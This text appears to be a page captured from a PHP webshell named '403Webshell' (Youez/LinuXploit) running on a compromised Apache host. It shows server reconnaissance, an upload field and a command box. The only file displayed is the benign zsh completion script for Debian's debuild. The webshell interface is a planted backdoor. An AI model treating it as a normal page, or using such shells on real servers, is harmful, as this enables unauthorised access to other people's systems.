403Webshell
Server IP : 217.160.0.244  /  Your IP : 216.73.217.138
Web Server : Apache
System : Linux infong-eu155 4.4.400-icpu-108 #2 SMP Wed Feb 11 11:51:01 UTC 2026 x86_64
User : u100174116 ( 6746176)
PHP Version : 8.5.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/zsh/functions/Completion/Debian/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/zsh/functions/Completion/Debian/_debuild
#compdef debuild

local ign noc

(( $#words > 2 )) && ign='!'
(( CURRENT != 2 )) && noc='!'

_arguments \
  "${ign}(- 1 *)"{-h,--help}'[display usage information]' \
  "${ign}(- 1 *)--version[display version and copyright information]" \
  ${noc}{--no-conf,--noconf}"[don't read devscripts config files]" \
  {-r-,--rootcmd=}'[specify command used to become root if debuild not setuid root]: : _command_names -e' \
  '(--preserve-env)*'{-e-,--preserve-envvar=}'[preserve environment variable]:environment variable:_parameters -g "*export*"' \
  '(-e --preserve-envvar)--preserve-env[preserve all environment vars (except PATH)]' \
  '*'{-e-,--set-envvar=}'[preserve environment variable]:environment variable:_parameters -g "*export*" -qS=' \
  '--prepend-path=[prepend to the sanitised PATH]: :_dir_list' \
  '(-D)-d[skip checking of build dependencies]' \
  '(-d)-D[force checking of build dependencies]' \
  '--check-dirname-level[specify how much to check directory names]:level [1]:((0\:never 1\:only\ if\ program\ changes\ directory 2\:always))' \
  '--check-dirname-regex[specify what constitutes a matching directory name]:perl regex [PACKAGE(-.*)?]'

Youez - 2016 - github.com/yon3zu
LinuXploit